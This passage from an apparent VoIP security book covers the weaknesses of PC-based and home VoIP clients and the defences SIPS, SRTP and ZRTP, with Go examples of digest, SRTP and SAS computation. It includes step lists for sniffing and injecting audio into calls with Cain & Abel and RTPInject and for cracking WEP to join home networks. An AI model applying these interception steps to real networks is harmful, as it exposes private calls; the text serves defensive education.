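	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"strings"
)

// md5Hex returns the lowercase hex MD5 digest of s, as RFC 2617 specifies.
func md5Hex(s string) string {
	sum := md5.Sum([]byte(s))
	return hex.EncodeToString(sum[:])
}

// DigestResponse computes the RFC 2617 "response" value for SIP digest
// authentication without the qop extension:
//   HA1      = MD5(username:realm:password)
//   HA2      = MD5(method:uri)
//   response = MD5(HA1:nonce:HA2)
// Username, realm, method, URI and nonce all travel in cleartext; only the
// password is secret.
func DigestResponse(username, realm, password, method, uri, nonce string) string {
	ha1 := md5Hex(strings.Join([]string{username, realm, password}, ":"))
	ha2 := md5Hex(strings.Join([]string{method, uri}, ":"))
	return md5Hex(strings.Join([]string{ha1, nonce, ha2}, ":"))
}

// VerifyResponse is the registrar-side check: recompute the response from the
// stored password and compare it in constant time with what the UA sent.
func VerifyResponse(username, realm, password, method, uri, nonce, got string) bool {
	want := DigestResponse(username, realm, password, method, uri, nonce)
	return subtle.ConstantTimeCompare([]byte(want), []byte(got)) == 1
}

// ParseAuthorization extracts the name="value" pairs from a SIP Authorization
// header value, i.e. the fields visible in the User Agent's packet.
func ParseAuthorization(header string) map[string]string {
	fields := map[string]string{}
	header = strings.TrimPrefix(strings.TrimSpace(header), "Digest ")
	for _, part := range strings.Split(header, ",") {
		kv := strings.SplitN(strings.TrimSpace(part), "=", 2)
		if len(kv) != 2 {
			continue
		}
		fields[kv[0]] = strings.Trim(kv[1], "\"")
	}
	return fields
}

func main() {
	// Constructed sample values (hypothetical account, realm and nonce).
	const password = "constructed-secret"
	hdr := `Digest username="16505550123", realm="sip.example.test", nonce="a1b2c3d4", uri="sip:sip.example.test"`
	f := ParseAuthorization(hdr)
	resp := DigestResponse(f["username"], f["realm"], password, "REGISTER", f["uri"], f["nonce"])
	fmt.Println("response =", resp)
	fmt.Println("verifies =", VerifyResponse(f["username"], f["realm"], password, "REGISTER", f["uri"], f["nonce"], resp))
}
```

Note that the registrar's verification and an offline guess are the same computation with the same public inputs; nothing in the digest itself limits how often it can be recomputed, so the defenses are strong passwords and an encrypted signaling channel.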
[12] Recall the events of 2006, when large organizations like Qwest and AT&T gave thousands of phone records to government agencies like the National Security Agency.
[13] See http://www.vonage.com/help.php?article=1033&category=127&nav=102&refer_id=OLNSRCH170307/
PC-Based VoIP Solutions

PC-based VoIP solutions have been an emerging trend over the past several years. As PC-based VoIP solutions have become easier to develop and more popular, almost every online company has shipped a peer-to-peer VoIP client. Large organizations including Google, Microsoft, Yahoo!, EarthLink, and even Nero, which makes CD/DVD burning software, have all released VoIP clients for the PC. This section will discuss the security of the most popular PC-based VoIP solutions.
Figure 8-15. Cracked Vonage password using SIP.Tastic
Yahoo! Messenger
Yahoo! Messenger is a popular instant messaging client that also supports VoIP services using SIP and RTP. While SIP/RTP communication is wrapped with TLS during PC-to-PC calls, RTP traffic is not protected on PC-to-landline calls. During a PC-to-PC call, Yahoo! Messenger wraps a lot of session and media information into TLS. A certain amount of RTP jitter leaks through during PC-to-PC calls, but no voice (audio) content can actually be extracted. Authentication attacks on PC-to-PC calls are also quite difficult, because Yahoo! Messenger's authentication occurs during the Single Sign-On (SSO) process with the Yahoo! portal. Hence, whether a user is logging on to his mail, his pictures, or a VoIP session, authentication will be wrapped in a TLS tunnel. While a decent amount of protection is provided on PC-to-PC calls, the same cannot be said for PC-to-PSTN calls, as discussed in the next section.
Eavesdropping on Yahoo! Messenger
Yahoo! Messenger also allows calls to be made to regular PSTN landlines or mobile phones. When a user wants to make a call to a PSTN line via Yahoo! Messenger, authentication still takes place via the software (because access to the UI to place landline or mobile calls is not available until the user has successfully logged in). After authentication occurs, a user may call any PSTN line instead of a PC running Messenger software. And unlike the PC-based calls, when a user calls a landline, the RTP protocol is used over the network. Similar to the attacks discussed in the RTP chapter, an anonymous attacker can sniff the connection between the person using Yahoo! Messenger and his outbound PSTN call. Once the attacker sniffs the information, she can eavesdrop on the call or inject RTP packets in the middle of the phone conversation. See Figure 8-16.
Figure 8-16. Eavesdropping on calls between Yahoo! Messenger and landlines or mobile phones
The only caveat here is that the attacker must have software supporting the codec used during the call. At the time of this publication, Cain & Abel supports some Yahoo! Messenger RTP codecs, but not all of them. In order to eavesdrop on a call between a Yahoo! Messenger client and a PSTN line, an attacker would complete the following steps. Results may vary depending on the codec support.
1. Repeat steps 1 through 13 from "Call Eavesdropping (RTP)".
2. On the bottom row, select VoIP. If VoIP communication has occurred on the network using RTP media streams, Cain & Abel will automatically save the RTP packets, reassemble them, and save them to .wav format. As shown in Figure 8-17, Cain & Abel has captured a few phone conversations over the network using a few simple steps.
Figure 8-17. Captured VoIP communication via RTP packets
Using a man-in-the-middle attack and Cain & Abel's default VoIP sniffer, which captures RTP packets, an attacker can easily capture and record calls between Yahoo! Messenger and the PSTN line. The key idea to keep in mind here is that the audio codec used during the call must be supported by Cain & Abel. If the codec is not fully supported, the recorded call may capture only one side of the audio. Cain & Abel will show if the codec is unsupported by indicating "IP1/IP2 codec not supported" in the Status column.
Injecting Audio into Yahoo! Messenger Calls
Similar to the RTP injection attack discussed in Chapter 4, Yahoo! Messenger calls to PSTN lines can also be injected with audio from an anonymous attacker. The injection attacks allow malicious entities on the network to inject audio into existing calls by Yahoo! users. Refer to "Voice Injection (RTP)", which shows you how to inject audio content into VoIP calls that use RTP for media transfer.
Google Talk
Google Talk uses Extensible Messaging and Presence Protocol (XMPP) and XMPP Extension Protocols (XEP) for its voice services. XMPP is an open XML protocol developed by the Jabber open source group. Google's XMPP communication uses TCP port 5222, with all traffic encrypted using TLS. XMPP alone offers no protection of the client's username or password when they are sent with the SASL (Simple Authentication and Security Layer) PLAIN mechanism; however, Google Talk forces authentication to take place with Google's Single Sign-On (SSO) token, as noted by the "X-GOOGLE-TOKEN" mechanism shown in Figure 8-18. The SSO is conducted over SSL before the XMPP communication process occurs, which protects the user's credentials.
Figure 8-18. XMPP XML, displaying Google Talk authentication token
Because the SSO authentication process takes place over TLS and XMPP media are wrapped over TLS, encryption protects the username, password, and media while they are in transit. The use of TLS for authentication and media (audio) transfer adds significantly to the security of Google Talk; however, a few SSL attacks can still take place. For example, a significant attack class on TLS/SSL is to perform a man-in-the-middle attack between the end user and the server. An attacker can place herself in the middle of a client and a server by attacking ARP, CAM tables, or DHCP and intercept the SSL certificate when the SSL handshake is attempted. During the SSL handshake, the attacker will need to entice a user to accept her fake TLS certificate. Because the attacker holds all private keys of her fake certificate, if the user accepts the fake certificate, the attacker can decrypt the TLS information and view its contents. The best tool for performing SSL man-in-the-middle attacks is Cain & Abel. However, Google Talk prevents this attack from happening with strong SSL security protections. If a Google Talk client, or any Google client using its SSO authentication, sees a fake, unsigned, or self-signed certificate during the SSL handshake, it automatically fails and does not allow the handshake to occur. It does not even give the user an option for an insecure handshake, as shown in Figure 8-19.
Figure 8-19. Failed SSL man-in-the-middle attack
Note that this is not so much an attack on TLS/SSL but rather a social engineering attack to get a user to accept a fake TLS/SSL certificate. Hence, while XMPP is largely a cleartext protocol, with Google's SSO requirement to use TLS with Google Talk media, all password information and media (audio) are encrypted over the wire. At the time of this publication, Google has openly discussed support for SIP in the future. If SIP is supported by Google Talk without the use of SSL, all the authentication attacks discussed in the SIP chapter will also apply to Google Talk (or to any VoIP client using SIP).
Microsoft Live Messenger
Microsoft Live Messenger, another popular instant messaging client, also supports VoIP services using SIP and RTP. Similar to Yahoo! Messenger, Microsoft wraps all session setup and media (audio) transfer on peer-to-peer voice calls with TLS. Although there has been much discussion about Microsoft's insecure VoIP communication, at the time of this publication, communication occurs via an encrypted TLS tunnel on PC-to-PC calls. Similar to Yahoo! Messenger and Google Talk, the authentication process of Live Messenger uses Microsoft's .NET SSO cookie over TLS. Because TLS protects the SSO cookie and the media (audio) communication, eavesdropping or injecting content during PC-to-PC calls on Windows Live Messenger is not possible using typical methods. If an SSL man-in-the-middle attack is attempted, as discussed previously, Live Messenger will also fail by not allowing a fake, unsigned, or self-signed certificate during the SSL handshake, as shown in Figure 8-20.
Figure 8-20. Failed SSL man-in-the-middle attack under Live Messenger
Unlike Google Talk, Microsoft Live Messenger provides the ability to make calls to regular PSTN landlines. The PSTN calls are provided by Verizon, allowing Microsoft to use the Verizon network to make calls outside of PC-based clients. When a user wants to make a call to a landline via Live Messenger, authentication still takes place via the SSO cookie (because access to the UI to place landline calls is not available until the user has successfully logged in).
Skype
Skype is a closed, non-standards-based VoIP client. Unlike all other PC-based VoIP software described in this chapter, Skype uses a completely proprietary format for session setup and media transfer. This means that Skype does not use traditional VoIP protocols, such as SIP, H.323, RTP, or XMPP, but rather its own home-grown VoIP implementation. Since its inception, Skype has probably been the most popular PC-based VoIP client, with more than 7 million registered users. In turn, because of its popularity and closed nature, Skype is probably the most curious VoIP client from a security perspective. While there have been many documented buffer overflows against Skype, there have not been any published reports of Skype data communications being insecure. Nevertheless, with a closed system, there is also no way for subscribers to verify where their packets may or may not be going and who may have access to the decrypted information. This is one of the biggest issues users have with the software. There have been independent reports written about Skype's encryption methods, which can be found at http://www.skype.com/security/files/2005-031%20security%20evaluation.pdf/. In addition to the paid white paper by Skype, a team of researchers has released a white paper on reverse engineering Skype, which can be found at http://www.secdev.org/conf/skype_BHEU06.pdf/.
SOHO Phone Solutions

The emerging use of software-based VoIP clients has changed how people make telephone calls; however, the majority of calls placed via Skype, Yahoo!, Microsoft, or Google are largely due to convenience or cost, and the VoIP solution used is not the default phone system in a household. There are many reasons for this, including reliability, call quality, and mobility. Mobility of software-based VoIP clients is an issue because users need to be near or on their computers to place a VoIP call. No matter how cheap the solution, average home users do not want to spend all their talk time in the computer room. Recognizing the limited mobility of software-based VoIP clients, small office/home office (SOHO) manufacturers have begun to create handsets that are similar to a regular cordless home phone but which operate through a software-based VoIP client that connects to the computer.

This section briefly reviews the security concerns when using the hybrid PC/hard phone solutions. The security implications are no different from those described previously if insecure protocols, such as SIP and RTP, are used, but the attack perspective is slightly changed. Many SOHO manufacturers, such as Linksys, Netgear, and D-Link, are creating products that integrate handsets with Yahoo! Messenger, Windows Live Messenger, or Google Talk. These products allow users to place regular PSTN calls via the handset as well as Yahoo! or Microsoft's voice services via VoIP. For example, users can sign in to the Yahoo! Messenger account from the handset itself and place a call to a favorite contact. The implementation design for the solution is the same as the one shown in Figure 8-16 in "Eavesdropping on Yahoo! Messenger". In order for the design to work, the SOHO handset must be connected with a USB cable to a PC with Yahoo! Messenger installed. The handset connects to the Yahoo! Messenger software on the PC, which then makes the outbound call to another Yahoo! Messenger user, a mobile phone, or a landline, all via the Internet. A user who wishes to make traditional PSTN calls without Yahoo! Messenger but through the local phone company should plug the base station of the handset into a telephone jack.

The security implications of the SOHO solutions can be wide or narrow depending on the location and usage. For example, a home user with Yahoo! Messenger on his PC is exposed to the same attack surface as a user with the SOHO handset, which is unauthorized network eavesdropping on the current network or upstream on the ISP. The use of a SOHO handset still allows an attacker to sniff all the RTP packets when users call landlines or cell phones. This is also true for the software solution. A further area of exposure to discuss with the handset solution is the use of home VoIP solutions within insecure wireless networks. A problematic setup is shown in Figure 8-21.
Figure 8-21. SOHO VoIP Network
Figure 8-21 shows a solution under which a home user may be connected to the Internet using a wireless access point/switch. If the home user has not secured her wireless access point or uses WEP, an attacker can join the wireless network and sniff the user's communication, including her Yahoo! Messenger VoIP calls. Many access points support WPA, a stronger security method for home wireless devices, but a great deal of wireless access points still use WEP, which is not a good security encryption method. An external attacker, as shown in the bottom of Figure 8-21, can perform the following steps to eavesdrop on or inject content into a user's home phone communication:
1. Locate the wireless network.
2. If WEP is enabled, use tools like Kismet, Aircrack, and Cain & Abel to obtain the WEP key.
3. Once on the wireless network, use Cain & Abel, as shown in "Voice Injection (RTP)", to eavesdrop from Yahoo! Messenger to a PSTN line.
4. Once on the wireless network, use RTPInject, as shown in "Voice Injection (RTP)", to inject audio into RTP packets from Yahoo! Messenger to a PSTN line.
Alternatively, if no wireless network is used, external exposures are limited to attacking the ISP's network. For example, if an attacker performed a man-in-the-middle attack on her publicly facing network subnet, all packets would arrive on her machine instead of on the ISP's upstream router. If any of these packets contained RTP packets, the attacker could eavesdrop or inject as she wishes. In the example, performing a targeted attack is harder as two neighbors with the same ISP could be on entirely different subnets. Because most homes have wireless access points with or without WEP, attacking the wireless network is probably the best attack surface.
It should be noted that internal attacks on the wired network switch/hub would work, regardless of whether Yahoo! Messenger on a PC or a Linksys device is being used. An internal attacker would need only to connect to the network switch shown in Figure 8-21 and use Cain & Abel or RTPInject to perform the attack she wants to carry out. Hence, if a hostile family member or roommate wishes to record all calls or inject content, any calls from the handheld device or PC software to a PSTN line are vulnerable.
Summary

A few home VoIP solutions have room for improvement when it comes to security, while others are pretty decent. Because many of the solutions use existing VoIP protocols, such as SIP and RTP, all of them will also inherit their security exposures. For example, if RTP is used with Yahoo! Messenger, Cisco hard phones, or Vonage, its security exposures will affect all products that use it. Commercial VoIP solutions, such as Vonage, have little security built into them. Items like encryption are totally absent, which may be a surprise to most customers. Furthermore, while PSTN landlines might be as vulnerable as Vonage, IP/Ethernet is a much larger attack surface given that anyone in your home or on your wireless network can listen to calls.

In addition, PC-based VoIP solutions have had some positive and negative results. All PC-based solutions that use SSO for authentication are using SSL, ensuring that the authentication information is protected. Also, the exposure on the PC-based solutions was limited to outbound PSTN calls, as PC-to-PC calls were wrapped with encryption. Finally, SOHO solutions were no different from the PC solution, exposing calls to landlines but not calls to PCs.

Home VoIP solutions are divided between PC-to-PC calls and PC-to-landline (or PC-to-hard phone) calls. When one is making PC-to-PC-based VoIP calls, SSL can be used to encrypt the communication. When calls are made to a landline or to a hard phone, things become more difficult. PC-to-landline calls use different protocols that often lack the security protections available in PC-to-PC calls.
Part III. ASSESS AND SECURE VOIP
Chapter 9. SECURING VOIP

Securing VoIP is an important task if you are going to protect information. While organizations often think of security in terms of folders and files, information spoken over voice can be just as important. For example, think of how many times people give their credit card number, mother's maiden name, or even their social security number over the phone. What if the customer service representative on the other end is using a VoIP phone? If the media layer uses RTP, an attacker can capture the packets and gain access to all the sensitive information. The lack of security of voice conversations, outlined in the first eight chapters, shows the need for secure VoIP networks. Many organizations like to say that VoIP networks are only used internally, so security is not a huge concern. Unfortunately, these organizations are essentially saying that every phone call, from the CEO's to the intern's, should be shared with everyone in the company, both professional calls and personal calls. We all know the statement is not true, but why such resistance to securing VoIP? The reason is that securing VoIP in the proper manner is not easy or cheap. It can be a cumbersome process that involves new hardware and more dollars. If security were just a checkbox on VoIP products, it would be everywhere. Vendors initially have not incorporated easy, safe, and interoperable security features into their products, and as a result the VoIP consumers have suffered. This chapter will begin the discussion on how to secure a VoIP network from the many attacks covered in this book. Specifically, the following areas will be discussed:
SIP over SSL/TLS (SIPS)
Secure RTP (SRTP)
ZRTP and Zfone
Firewalls and Session Border Controllers
SIP over SSL/TLS

SIP over SSL/TLS (SIPS; specifically SSLv3 or TLSv1), which uses TCP port 5061, is a method for securing SIP session information from anonymous eavesdroppers.
Note✎
Previous versions of SSL, such as SSLv2, should not be used due to known weaknesses in the implementation.
As discussed in Chapter 2, SIP is a cleartext protocol that can be manipulated and monitored by passive attackers on the network. Furthermore, the authentication method used by SIP is digest authentication, which is vulnerable to an offline dictionary attack. An offline dictionary attack by itself is a concern; however, combined with the fact that most SIP User Agents use four-digit codes for passwords (usually the last four digits of the phone's extension), this makes SIP authentication very vulnerable to attackers. To help mitigate the authentication issue, as well as many other issues with SIP, SIPS (SIP over SSL/TLS) can encrypt the session protocol from a SIP User Agent to a SIP Proxy server. Furthermore, the SIP Proxy server can also use TLS with the next hop, ensuring that each hop along the path is encrypted. Using TLS with SIP is similar to using TLS with HTTP. There is a required certificate exchange process between two entities as well as session keys that must be used. The primary difference between HTTP and SIP is the use of a browser versus a hard or soft phone. Both client entities need to have support for TLS with some type of embedded TLS client and a certificate chain process. The following steps show a high-level example of the SIPS process:
1. The SIP User Agent contacts the SIP Proxy server for a TLS session.
2. The SIP Proxy server responds with a public certificate.
3. The SIP User Agent validates the public certificate from the Proxy server using its root chain (similar to the root chain that Internet browsers contain).
4. The SIP User Agent and the SIP Proxy server exchange session keys to encrypt and decrypt information for the session.
5. The SIP Proxy server contacts the next hop, such as the remote SIP Proxy server or next User Agent, and negotiates a TLS session with that endpoint. See Figure 9-1.
Figure 9-1. High-level TLS communication from a hard phone to a SIP Proxy
Now that we know the general method for using TLS on SIP, the next step is to implement TLS. Implementation is not quite as standard as it is for HTTP, because most people use only a few browsers and web servers. In the VoIP world, there are several vendors of hard and soft phones as well as different types of SIP Proxy servers supporting SIPS. Hence, depending on the implementation of the VoIP network, there are a few ways to implement TLS on SIP phones. The following are URLs for some popular platforms:
OpenSER TLS Implementation Steps, http://confluence.terena.org:8080/display/IPTelCB/3.5.2.+TLS+for+OpenSER+(UA-Proxy)/
Cisco TLS Implementation Steps, http://www.cisco.com/en/US/docs/ios/12_3/vvf_c/cisco_ios_sip_high_availability_application_guide/hachap2.html#wp1136622/
Avaya TLS Implementation Steps, http://support.avaya.com/elmodocs2/sip/S6200SesSip.pdf/
Secure RTP

Secure RTP (SRTP), as defined by RFC 3711, is a protocol that adds encryption, confidentiality, and integrity to the actual voice part of VoIP calls that use RTP and RTCP (Real Time Control Protocol). As we saw in the previous section, wrapping SIP or H.323 traffic over TLS protects the authentication information; however, the more important part of the call is probably the actual media stream that contains the audio. A SIP infrastructure using TLS with a cleartext RTP media stream still allows attackers to eavesdrop on or inject audio into calls and acquire confidential information. SRTP works by encrypting the RTP payload of a packet. The RTP header information is not encrypted because the receiving endpoints, routers, and switches need to view that information in order for the communication path to be completed. Thus, in order to ensure protection of the header, SRTP provides authentication and integrity checking for the RTP header information with an HMAC-SHA1 function. It's important to note that SRTP does not supply any additional encryption headers, making it look very similar to RTP packets on the wire. This allows QoS features to remain unaffected. The following sections briefly describe these functions of SRTP:
SRTP and Media Protection with AES Cipher
SRTP and Authentication and Integrity Protection with HMAC-SHA1
SRTP Key Distribution Method
SRTP and Media Protection with AES Cipher
SRTP utilizes the Advanced Encryption Standard (AES) as the cipher for encryption, which can be used with two cipher modes. The two cipher modes that can be used with AES are Segmented Integer Counter Mode (SICM), which is the default, and f8 mode. A third option, the NULL cipher, is also defined, but it should never be deployed, as it provides no encryption of the media stream.
Note✎
Before AES was standard with RTP, Avaya created an alternative, which is called Avaya Encryption Algorithm. In general, using proprietary encryption is not recommended for security or interoperability reasons.
SRTP and Authentication and Integrity Protection with HMAC-SHA1
In addition to AES, which provides encryption to the payload, SRTP can provide message integrity to the header part of the packet with HMAC-SHA1. HMAC (keyed-Hash Message Authentication Code) is a message authentication code built on a cryptographic hash function that verifies both the data integrity and the authenticity of a message. HMACs are often used with the SHA-1 hash function, denoted HMAC-SHA1. Under this technique, an HMAC-SHA1 tag is appended to the end of a packet to provide integrity between two VoIP endpoints. The integrity addition will ensure that VoIP packets are not susceptible to replay attack, which can still occur even with AES encryption of the media stream. Figure 9-2 shows the structure of an RTP packet using SRTP for authentication and encryption.
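To make the SRTP functions described in this section and the previous two concrete (cleartext header, AES counter-mode payload encryption, HMAC-SHA1 tag), here is an added Go example that is not the book's code and not libSRTP. It protects a constructed RTP packet, shows that the header is still readable while the audio is not, and shows that a packet whose cleartext header has been edited is rejected before any decryption takes place. Two simplifications relative to RFC 3711 are labelled in the comments: session keys are supplied directly instead of being derived from the master key, and the counter block is a constructed layout built from the SSRC and sequence number without the session salt.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"errors"
	"fmt"
)

// Simplified SRTP-style packet protection (illustrative, not an RFC 3711
// implementation): the 12-byte RTP header stays in cleartext, the payload is
// encrypted with AES in counter mode, and an 80-bit HMAC-SHA1 tag over header
// plus encrypted payload is appended. Assumptions: session keys are given
// directly rather than derived with the SRTP key derivation function, and the
// counter block is built from SSRC and sequence number without a salt.

const (
	rtpHeaderLen = 12
	tagLen       = 10 // HMAC-SHA1 truncated to 80 bits, the SRTP default
)

// rtpHeader builds a minimal RTP header: V=2, no padding, extension or CSRCs.
func rtpHeader(payloadType byte, seq uint16, ts, ssrc uint32) []byte {
	h := make([]byte, rtpHeaderLen)
	h[0] = 0x80
	h[1] = payloadType & 0x7f
	binary.BigEndian.PutUint16(h[2:], seq)
	binary.BigEndian.PutUint32(h[4:], ts)
	binary.BigEndian.PutUint32(h[8:], ssrc)
	return h
}

// counterIV gives every packet of a stream its own keystream segment by
// placing the SSRC and sequence number in the AES-CTR counter block.
func counterIV(hdr []byte) []byte {
	iv := make([]byte, aes.BlockSize)
	copy(iv[4:8], hdr[8:12])  // SSRC
	copy(iv[12:14], hdr[2:4]) // sequence number
	return iv
}

// ctrXOR applies the AES-CTR keystream; encryption and decryption are identical.
func ctrXOR(encKey, iv, data []byte) ([]byte, error) {
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	cipher.NewCTR(block, iv).XORKeyStream(out, data)
	return out, nil
}

func authTag(authKey, authenticated []byte) []byte {
	mac := hmac.New(sha1.New, authKey)
	mac.Write(authenticated)
	return mac.Sum(nil)[:tagLen]
}

// Protect turns header||payload into header||ciphertext||tag. Routers and QoS
// equipment can still read the header; only the audio is hidden.
func Protect(encKey, authKey, packet []byte) ([]byte, error) {
	if len(packet) < rtpHeaderLen {
		return nil, errors.New("packet shorter than an RTP header")
	}
	hdr := packet[:rtpHeaderLen]
	enc, err := ctrXOR(encKey, counterIV(hdr), packet[rtpHeaderLen:])
	if err != nil {
		return nil, err
	}
	out := append(append([]byte{}, hdr...), enc...)
	return append(out, authTag(authKey, out)...), nil
}

// Unprotect verifies the tag before decrypting, so a modified or forged header
// (for example a replayed packet with an edited sequence number) is rejected.
func Unprotect(encKey, authKey, packet []byte) ([]byte, error) {
	if len(packet) < rtpHeaderLen+tagLen {
		return nil, errors.New("packet too short to carry an SRTP tag")
	}
	body, tag := packet[:len(packet)-tagLen], packet[len(packet)-tagLen:]
	if !hmac.Equal(tag, authTag(authKey, body)) {
		return nil, errors.New("authentication tag mismatch")
	}
	hdr := body[:rtpHeaderLen]
	plain, err := ctrXOR(encKey, counterIV(hdr), body[rtpHeaderLen:])
	if err != nil {
		return nil, err
	}
	return append(append([]byte{}, hdr...), plain...), nil
}

func main() {
	// Constructed session keys; a deployment derives them from the master key.
	encKey := bytes.Repeat([]byte{0x11}, 16)
	authKey := bytes.Repeat([]byte{0x22}, 20)
	packet := append(rtpHeader(0, 1000, 160000, 0xdeadbeef), []byte("constructed audio bytes")...)

	srtp, _ := Protect(encKey, authKey, packet)
	fmt.Printf("header in clear: %x\n", srtp[:rtpHeaderLen])
	fmt.Printf("payload hidden:  %x\n", srtp[rtpHeaderLen:len(srtp)-tagLen])
	back, err := Unprotect(encKey, authKey, srtp)
	fmt.Println("round trip ok:", err == nil && bytes.Equal(back, packet))

	tampered := append([]byte{}, srtp...)
	tampered[2] ^= 0x01 // flip a bit of the cleartext sequence number
	_, err = Unprotect(encKey, authKey, tampered)
	fmt.Println("tampered header rejected:", err != nil)
}
```

The order of operations in Unprotect is the point worth copying: the tag is checked over the whole packet first, so the cleartext header, although readable by everyone on the path, cannot be altered by anyone who lacks the authentication key.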
Figure 9-2. SRTP packet example
The following steps provide an example of how SRTP can be used between two endpoints. In this example, endpoints Sonia and Kusum wish to communicate via SRTP using encryption for the payload and authentication for the header in the RTP packet.
1. Sonia requests the session keys from the mediating device, such as Asterisk, Cisco CallManager, or Avaya Call Center/Server.
2. The mediating device, which has the master key, opens two sessions each with Sonia and Kusum. The two sessions are for each direction of the media stream.
3. During the key negotiation phase, the master key is passed in the header of the session setup protocol, such as SIP or H.323. The actual session keys are then generated using AES on the clients. After receiving the master key, Sonia and Kusum create their session keys for the communication.
4. After both Sonia and Kusum have created the session keys, the SRTP communication can occur.
Depending on the implementation of the VoIP network, there are a few ways to implement SRTP between VoIP devices. Here are the URLs for some popular platforms:
Asterisk SRTP Implementation Steps, http://www.voip-info.org/wiki/view/Asterisk+SRTP/
Cisco SRTP Implementation Steps, http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803fe693.html#wp1033627/
Avaya SRTP Implementation Steps, http://www.avaya.com/master-usa/en-us/resource/assets/applicationnotes/srtp-iptrunk.pdf/
libSRTP, an open source library for SRTP, http://srtp.sourceforge.net/srtp.html/
SRTP Key Distribution Method
One major "gotcha" for SRTP is if the key exchange process occurs over cleartext, which can happen if a VoIP infrastructure is using SIP or H.323 without a TLS tunnel. Thus, the SRTP master key can be captured from cleartext SIP or H.323 packets, and an attacker could decrypt any encrypted SRTP packets captured over the wire. If SRTP is being used for security purposes, ensure that TLS is used with SIP or H.323; otherwise, the security benefit of SRTP is reduced.
ZRTP and Zfone

ZRTP, an extension of RTP, applies Diffie-Hellman (DH) key agreement to existing SRTP packets by providing key-management services during the setup process of a VoIP call between two endpoints. It stays far away from the session layer, such as SIP and H.323, and focuses solely on SRTP. ZRTP creates a shared secret that is used to generate keys and a salt for SRTP sessions. One of the nice things about the protocol is that it does not require prior shared secrets or a Public Key Infrastructure (PKI) to be in place. ZRTP is similar to PGP (Pretty Good Privacy) as it tries to ensure that man-in-the-middle attacks do not occur between two endpoints. In order to solve these issues, it uses a Short Authentication String (SAS), which is a hash value of the DH keys. The SAS hash is communicated to both VoIP endpoints using ZRTP. Each endpoint verifies the SAS value to ensure that the hashes match and that no tampering has taken place.

An implementation of ZRTP is found in Zfone, a VoIP client that uses ZRTP for secure media communication. Zfone can be used with any session setup protocol, such as SIP or H.323, as long as RTP is used for the media layer. Furthermore, Zfone can be used with any existing software-based VoIP client that does not use media encryption. In a few cases, Zfone may already be integrated within the VoIP client, although the author has not seen any integrated implementations yet. In order for Zfone to encrypt VoIP communication using RTP, it watches the protocol stack on an operating system and intercepts all VoIP communication. Once the VoIP communication has been intercepted, Zfone encrypts it before it proceeds any further into the OS. For example, if a non-SRTP or non-ZRTP client is making a VoIP call, Zfone detects that the call began by watching the network communication to and from the machine. It then initiates a key agreement between the local client and the remote client. After the key agreement has been completed, Zfone then encrypts all the RTP packets over the wire between the source and the destination (Zfone must be installed on both sides, the sender and the destination).

Complete the following exercise to use Zfone between two VoIP clients that do not natively support media encryption. You'll need the following: X-Lite VoIP softphone from http://www.counterpath.com/index.php?menu=Products&smenu=xlite/, Zfone from http://www.zfoneproject.com/, and a locally administered Asterisk server:
1. Log in to the Asterisk server.
2. Change directories to the Asterisk folder with the following command: cd /etc/asterisk.
3. Open the sip.conf file in /etc/asterisk and add the following items at the end of the file:
   [Sonia]
   type=friend
   username=Sonia
   host=dynamic
   secret=123voiptest
   context=test
   [Raina]
   type=friend
   username=Raina
   host=dynamic
   secret=123voiptest
   context=test
4. Open the extensions.conf file in /etc/asterisk and add the following items in the [test] context (each extension needs a priority, here 1, before the Dial application):
   [test]
   exten => 100,1,Dial(SIP/Sonia)
   exten => 101,1,Dial(SIP/Raina)
5. Install X-Lite on two PCs. In order to direct the VoIP softphone to your Asterisk server, configure X-Lite using the following steps:
   a. Select the down arrow drop-down box.
   b. Navigate to SIP Account Settings.
   c. Select Properties.
   d. Select the Account tab and enter the following:
      Username: Username (Sonia or Raina)
      Password: 123voiptest
      Domain: IP address of Asterisk Server
   e. Select OK and Close.
6. Download (from http://www.zfoneproject.com/), install, and enable Zfone on both PCs.
7. Once X-Lite has been configured and Zfone has been enabled, use one PC to call the other X-Lite client at extension 100.
8. Once X-Lite has made the call, Zfone will intercept the communication and encrypt the media using ZRTP. If the call is secure, Zfone will show Secure in green as shown in Figure 9-3. If the call is not secure, Zfone will show Not Secure in red as shown in Figure 9-4.
Figure 9-3. Zfone Secure usage with X-Lite softphone
Figure 9-4. Zfone Not Secure usage with X-Lite softphone
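The SAS mechanism described in the ZRTP section above, as an added Go example that is neither Zfone's code nor the book's: two endpoints, Sonia and Kusum, each generate an ephemeral X25519 key pair, agree on a shared secret, and derive a four-character Short Authentication String from that secret and the public keys as each side saw them. RunCall can optionally insert an intermediary who substitutes her own keys in both directions; because she then holds two different secrets, the two phones display different strings, which is what the users detect when they read the SAS to each other. The derivation is a hash of the DH material in the spirit of the text, not ZRTP's exact formula, and the endpoint names are hypothetical.

```go
package main

import (
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// endpoint is one party in a ZRTP-style key agreement: an ephemeral X25519
// key pair and, after the exchange, the shared secret.
type endpoint struct {
	name   string
	priv   *ecdh.PrivateKey
	secret []byte
}

func newEndpoint(name string) (*endpoint, error) {
	priv, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &endpoint{name: name, priv: priv}, nil
}

func (e *endpoint) pub() []byte { return e.priv.PublicKey().Bytes() }

// agree derives the shared secret from the public key bytes as they arrived
// on the wire, which is exactly the value an intermediary could substitute.
func (e *endpoint) agree(peerPub []byte) error {
	pub, err := ecdh.X25519().NewPublicKey(peerPub)
	if err != nil {
		return err
	}
	e.secret, err = e.priv.ECDH(pub)
	return err
}

// SAS derives a four-character Short Authentication String from the shared
// secret and both public keys in the order each side saw them (initiator
// first). This is a constructed derivation in the spirit of the text, not
// ZRTP's exact formula over the full message flow.
func SAS(secret, initiatorPub, responderPub []byte) string {
	h := sha256.New()
	h.Write(secret)
	h.Write(initiatorPub)
	h.Write(responderPub)
	v := binary.BigEndian.Uint32(h.Sum(nil)[:4])
	const alphabet = "ybndrfg8ejkmcpqxot1uwisza345h769" // z-base-32
	out := make([]byte, 4)
	for i := range out {
		out[i] = alphabet[(v>>(27-5*uint(i)))&31]
	}
	return string(out)
}

// RunCall performs one key agreement between Sonia (initiator) and Kusum
// (responder). With withMITM set, an intermediary replaces each public key in
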